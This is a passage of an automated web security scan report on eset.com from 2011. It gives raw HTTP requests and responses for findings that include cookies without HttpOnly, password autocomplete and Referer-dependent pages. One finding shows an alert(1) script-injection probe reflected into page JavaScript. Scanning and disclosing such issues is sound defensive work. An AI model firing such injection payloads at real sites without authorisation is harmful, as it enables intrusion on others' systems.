<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=25ffd"-alert(1)-"abb6facb5f7";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.eset.com/us/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=uuss79pefnmjm9rulldneu8oc2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 20-May-2011 13:45:34 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26550
Date: Mon, 21 Mar 2011 13:45:34 GMT
X-Varnish: 451497164
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

2.2. http://www.eset.com/us/request/jsonp/topsearches.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/request/jsonp/topsearches.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/request/jsonp/topsearches.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.eset.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=3ia4ok549tf7feufqdmgb3od81; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/javascript
Content-Length: 3419
Date: Mon, 21 Mar 2011 13:47:18 GMT
X-Varnish: 451503933
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

var __topsearches = ["2.7","4.2","0x101a","64-bit","64-bit or 32-bit","Kerio","account","activation","android","antivirus","antivirus gratis","antivirus security suite","apple","authentication server"
...[SNIP]...

2.3. http://www.eset.com/us/styles/store-new.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 21-Mar-2010 13:46:04 GMT
Set-Cookie: tnt=2; expires=Fri, 20-May-2011 13:46:05 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26572
Date: Mon, 21 Mar 2011 13:46:05 GMT
X-Varnish: 451498549
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

3. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13322
Date: Mon, 21 Mar 2011 13:46:07 GMT
X-Varnish: 451498683
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<div id="partner_login">
<form action="https://secure.eset.com/us/partners" method="post">
<h4>
...[SNIP]...
</label>
<input type="password" class="text" value="" name="password" />
</p>
...[SNIP]...

4. Referer-dependent response  previous  next
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



4.1. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/home/smart-security

Request 1

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.7.10.1300715138; mbox=check#true#1300715233|session#1300715160014-248282#1300717033|PC#1300715160014-248282.17#1301924773; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716973362%3B%20gpv_pageName%3Dus/us/new_homepage%7C1300716973366%3B%20s_nr%3D1300715173368-New%7C1332251173368%3B%20s_invisit%3Dtrue%7C1300716973372%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/us/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24961
Date: Mon, 21 Mar 2011 13:46:15 GMT
X-Varnish: 451499234
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
</body>
</html>

Request 2

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.7.10.1300715138; mbox=check#true#1300715233|session#1300715160014-248282#1300717033|PC#1300715160014-248282.17#1301924773; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716973362%3B%20gpv_pageName%3Dus/us/new_homepage%7C1300716973366%3B%20s_nr%3D1300715173368-New%7C1332251173368%3B%20s_invisit%3Dtrue%7C1300716973372%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/us/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24944
Date: Mon, 21 Mar 2011 13:46:24 GMT
X-Varnish: 451499746
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
</body>
</html>

4.2. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/store

Request 1

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715236|session#1300715160014-248282#1300717036|PC#1300715160014-248282.17#1301924776; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.10.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716977129%3B%20gpv_pageName%3Dus/store%7C1300716977132%3B%20s_nr%3D1300715177136-New%7C1332251177136%3B%20s_invisit%3Dtrue%7C1300716977140%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38196
Date: Mon, 21 Mar 2011 13:46:35 GMT
X-Varnish: 451500419
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
</body>
</html>

Request 2

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715236|session#1300715160014-248282#1300717036|PC#1300715160014-248282.17#1301924776; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.10.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716977129%3B%20gpv_pageName%3Dus/store%7C1300716977132%3B%20s_nr%3D1300715177136-New%7C1332251177136%3B%20s_invisit%3Dtrue%7C1300716977140%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38145
Date: Mon, 21 Mar 2011 13:46:44 GMT
X-Varnish: 451501068
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
</body>
</html>

4.3. http://www.eset.com/us/styles/store-new.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Request 1

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 21-Mar-2010 13:46:04 GMT
Set-Cookie: tnt=2; expires=Fri, 20-May-2011 13:46:05 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26572
Date: Mon, 21 Mar 2011 13:46:05 GMT
X-Varnish: 451498549
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/store";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
</body>
</html>

Request 2

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 21-Mar-2010 13:46:12 GMT
Set-Cookie: tnt=2; expires=Fri, 20-May-2011 13:46:13 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26550
Date: Mon, 21 Mar 2011 13:46:13 GMT
X-Varnish: 451499094
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
</body>
</html>

5. Cross-domain POST  previous  next
There are 7 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


5.1. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
